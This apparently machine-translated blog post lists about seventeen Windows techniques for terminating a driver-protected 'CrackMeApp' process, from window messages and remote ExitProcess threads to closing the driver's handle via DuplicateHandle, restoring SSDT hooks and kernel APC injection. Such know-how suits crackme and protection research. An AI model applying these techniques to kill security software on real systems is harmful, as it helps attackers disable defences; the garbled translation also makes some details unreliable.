Multiple methods to terminate a process

1. Use the FindWindow method and try to send the WM_CLOSE message in the window.

2. Locate the thread of the process and send the WM_QUIT message to the PostThreadMessage to end the main thread.

3. OpenThread ---> TerminateThread

4. RemoteExitProcess: Open the process in PROCESS_CREATE_THREADVM_OPERATION mode, and create a remote thread. The thread start address is the ExitProcess parameter 0, and the program is disconnected.

5. First, make sure that the process can be opened (introduced in 8 and 9), then create a thread to DebugActiveProcess, and then quit the thread without having to take over the program ~

6. open the process in VM_OPERATION mode, and then call NtUnmapViewOfSection to uninstall its ntdll. at this time, the program has not crashed, and then a message is sent to it at will. Once called, its program will be abnormal, but ntdll has been suspended and cannot be processed in user space, disconnected on your own ~ (I think this method should be the same as writing junk data to the process space)

7. Send the ESC-clicked message on the keyboard (this cannot be the same as the send window message ).

8. The following highlights :-----------------------------
Because the CrackMeApp opens the file handle of the driver, the driver cannot be detached directly. Therefore, you need to disable this handle.
So how can I obtain a remote file handle? The first thing that comes to mind is DuplicateHandle,
BOOL DuplicateHandle (
HANDLE hSourceProcessHandle, // handle to source process
HANDLE hSourceHandle, // handle to duplicate
HANDLE hTargetProcessHandle, // handle to target process
LPHANDLE lpTargetHandle, // duplicate handle
DWORD dwDesiredAccess, // requested access
BOOL bInheritHandle, // handle inheritance option
DWORD dwOptions // optional actions
);

First look at the last parameter:
DUPLICATE_CLOSE_SOURCE
Closes the source handle. This occurs regardless of any error status returned.
DUPLICATE_SAME_ACCESS
Ignores the dwDesiredAccess parameter. The duplicate handle has the same access as the source handle.

That is to say, when DUPLICATE_CLOSE_SOURCE is selected, the remote handle is automatically disabled.

The first parameter can be obtained directly from OpenProcess (PROCESS_DUP_HANDLE, XXX,
The second parameter is hard to find, that is, to open the driver handle in the CrackMeApp process, we need to use ntdll to obtain this. an API in dll, ZwQuerySystemInformation, can obtain all the handle information of the entire system. We can find all the handles and then determine which handle belongs to the CrackMeApp process and the ObjectTypeNumber type is file. for details about this implementation, see my implementation code.

Typedef struct _ SYSTEM_HANDLE_INFORMATION {// Information Class 16
ULONG ProcessId;
UCHAR ObjectTypeNumber;
UCHAR Flags; // 0x01 = PROTECT_FROM_CLOSE, 0x02 = INHERIT
USHORT Handle;
PVOID Object;
ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;

In this way, all the handles opened through CreateFile in the CrackMeApp process are found. Generally, there are three handles. We can close them all, you can also close the last one (because the last is to open the driver handle, and the last time the driver is opened, CreateFile is called ).

Now I get the second parameter. The following parameters are quite simple ~

Therefore, when we call this DuplicateHandle, we not only disable the remote handle, but also get the driver handle ~~

So my 8th method is to send an IO request to the driver of the CrackMeApp and request it to modify the protected process PID to 0, in this way, we can end it with the conventional method (Open + Terminate)

9. If the remote handle of the above method is disabled, we can unmount the driver ~ So this is to go to ZwUnloadDriver or stop its Service. In this way, end with the conventional method ~~

Then we can use the handle in csrss.exe to dup. The method of DUP is basically the same as above, but the process to be determined should be csrss, type: 5 (Process Handle type). Then, perform a query with the ZwQueryInformationProcess () parameter BASIC_INFORMATION = 0 for each process handle to check whether the handle is CrackMeApp, if yes, use it directly, TerminateProcess ~

--------------- The following is the end with the help of the driver -----------

11. Use the drive patch to protect the PID value, and then use the conventional method in the user space ~

12. Use the driver to recover ZwOpenProcess in SSDT. Here I am lazy and hard-coded to call the function of the driver to recover SSDT ~~ Then the conventional method in the user space (this is not the same as 11)

13. call NtOpenProcess directly in the driver to bypass its ssdt hook. However, you must change the previusmode value in the kthread struct to KernelMode. Otherwise, it may fail ~
Call ZwTerminateProcess after obtaining the handle. You do not need to modify the previusmode ~

14. The different method from the method 13 is to open the handle. The method pslookupprocpolicyprocessid + ObOpenObjectByPointer is used, and then ZwTerminateProcess ~ is called ~ (This should be different, because the rules once said that ObXXX and NtXX are different APIs)

15. finally, first obtain the tid of the CrackMeApp thread, then obtain the EThread pointer Based on the PsLookupThreadByThreadId, and then insert the APC call to this thread. In the APC process function, the main task is to execute ZwTerminateProcess (0 xffffffff, 0). This is to end your meaning (hey, this method is obtained from IceSword )~~ Originally, I wanted to call Nt/ZwTerminateThread. As a result, I had to find the function myself, so simply click ZwTerminateProcess.

16 memory clearing method

Html> http://hi.baidu.com/%C3%F7%ED%F8%B5%C4%D0%C4/blog/item/255cd583fe406698f603a6f2.html

17 job termination

ZwOpenProcess-> ZwCreateJobObject-> ZwAssignProcessToJobObject-> ZwTerminateJobObject

2. enumeration process